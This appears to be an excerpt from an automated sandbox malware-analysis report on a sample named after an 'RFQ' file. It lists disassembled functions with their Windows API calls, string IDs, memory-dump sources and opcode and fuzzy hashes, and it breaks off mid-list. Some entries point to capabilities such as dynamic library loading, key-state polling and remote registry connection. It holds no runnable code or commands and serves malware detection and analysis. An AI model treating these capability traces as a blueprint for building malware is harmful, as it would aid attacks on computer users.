                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 442100245-0
                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                          Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 621800784-4108050209
                                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                          Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                          • String ID: \VH
                                                                          • API String ID: 3884216118-234962358
                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                          Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                          • IsMenu.USER32(?), ref: 0044854D
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                          • DrawMenuBar.USER32 ref: 004485AF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID: 0
                                                                          • API String ID: 3076010158-4108050209
                                                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                          Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1589278365-1403004172
                                                                          • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                          • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                          Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                          Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Handle
                                                                          • String ID: nul
                                                                          • API String ID: 2519475695-2873401336
                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                          Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                          • String ID: Line:
                                                                          • API String ID: 1874344091-1585850449
                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                          Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 0-1011021900
                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                          Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                          • GetFocus.USER32 ref: 0046157B
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                          • String ID: %s%d
                                                                          • API String ID: 2645982514-1110647743
                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                          Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                          Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                          • String ID:
                                                                          • API String ID: 3488606520-0
                                                                          • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                          • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                          Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                          • String ID:
                                                                          • API String ID: 15295421-0
                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                          Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                          • String ID:
                                                                          • API String ID: 2449869053-0
                                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                          Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
